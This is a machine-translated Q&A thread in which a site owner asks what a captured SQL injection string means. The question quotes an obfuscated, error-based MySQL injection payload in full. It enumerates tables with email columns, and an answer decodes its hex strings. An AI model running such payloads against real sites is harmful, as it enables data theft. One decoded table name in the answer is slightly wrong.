这种SQL注入的目的是什么?

时间:2016-11-25 17:03:29

标签: mysql sql sql-injection

我有一个网站。如果有错误,我会将电子邮件发送到系统帐户。我今天看到以下内容,我假设是SQL。我将不得不解决问题。这样做会有人知道这个人想要达到的目的吗?

AdID=50427 or 1=(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x25656d61696c25 and not t./**/tAbLe_nAmE in(0x42524944455f54424c,0x42524944455f54424c5f505542,0x434f4e54414354,0x434f4e544143545f54424c,0x47524f4f4d5f54424c,0x47524f4f4d5f54424c5f505542,0x4f524445525f54424c,0x7068703132315f75736572735f64656c65746564,0x535542534352494245525f4c495354,0x555345525f44454c45544544,0x555345525f50524f46494c455f44454c45544544) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 11,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and 1=1

1 个答案:

答案 0 :(得分:1)

具体而言,它试图找出哪些非系统表具有包含email的列并排除以下表格:

BRIDE_PUB   
BRIDE_TBL_PUB   
CONTACT 
CONTACT_TBL 
GROOM_TBL   
GROOM_TBL_PUB   
ORDER_TBL   
php121_users_deleted    
SUBSCRIBER_LIST 
USER_DELETED    
USER_PROFILE_DELETED

我认为攻击者已经知道了。

所以基本上他们试图窃取您的电子邮件地址以作为邮件列表出售(这是SQL注入攻击的典型情况)。

仅供参考,这是我用来查看字符串的查询:

select
    CAST(0x217e21 as varchar(99)),
    CAST(0x696e666f726d6174696f6e5f736368656d61 as varchar(99)), 
    CAST(0x6d7973716c as varchar(99)), 
    CAST(0x25656d61696c25 as varchar(99)), 
    CAST(0x42524944455f54424c as varchar(99)), 
    CAST(0x42524944455f54424c5f505542 as varchar(99)), 
    CAST(0x434f4e54414354 as varchar(99)), 
    CAST(0x434f4e544143545f54424c as varchar(99)), 
    CAST(0x47524f4f4d5f54424c as varchar(99)), 
    CAST(0x47524f4f4d5f54424c5f505542 as varchar(99)), 
    CAST(0x4f524445525f54424c as varchar(99)), 
    CAST(0x7068703132315f75736572735f64656c65746564 as varchar(99)), 
    CAST(0x535542534352494245525f4c495354 as varchar(99)), 
    CAST(0x555345525f44454c45544544 as varchar(99)), 
    CAST(0x555345525f50524f46494c455f44454c45544544 as varchar(99))

(我在MS SQL Server上做过这个,不确定MySql上的语法是否完全相同)

相关问题
最新问题